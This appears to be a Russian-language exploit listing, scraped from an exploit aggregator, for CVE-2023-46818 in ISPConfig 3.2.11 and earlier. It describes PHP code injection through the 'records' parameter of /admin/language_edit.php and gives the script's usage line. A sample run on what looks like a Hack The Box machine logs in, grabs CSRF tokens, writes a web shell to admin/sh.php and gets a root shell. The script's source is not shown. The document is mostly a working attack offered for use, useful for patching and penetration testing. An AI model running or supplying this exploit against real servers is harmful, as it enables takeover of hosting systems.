## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AJDUMANHUG-CVE-2023-46818
# CVE-2023-46818 Python Exploit
## 🔥 Описание
Этот скрипт эксплойта на Python нацелен на уязвимость безопасности в параметре `records` POST-запроса к `/admin/language_edit.php` в ISPConfig, который не фильтруется должным образом. Это позволяет аутентифицированному администратору внедрять и выполнять произвольный PHP-код.
## ⚠️ Уязвимые версии
Версия 3.2.11 и более ранние версии.
## ⚙️ Использование
root@kitploit:~
python3 CVE-2023-46818.py <URL> <Имя_пользователя> <Пароль>
## 💻 Пример запуска
root@kitploit:~
┌──(motoh4ck3r㉿kali)-[~/HTB/Linux/nocturnal]
└─$ python3 CVE-2023-46818.py http://127.0.0.1:8081 motoh4ck3r broombroom
[+] Выполняется вход с именем пользователя 'motoh4ck3r' и паролем 'broombroom'
[+] Вход выполнен успешно!
[*] Получение CSRF-токенов...
[+] CSRF ID: language_edit_92017c65f0bcba0f230f5cc1
[+] CSRF Key: 7d06eed7d23c29e5c9633920a8122339d91373e8
[+] Внедрение полезной нагрузки для shell...
[+] Shell записан по адресу: http://127.0.0.1:8081/admin/sh.php
[+] Запуск shell...
ispconfig-shell# hostname & whoami & id
nocturnal
root
uid=0(root) gid=0(root) groups=0(root)
ispconfig-shell#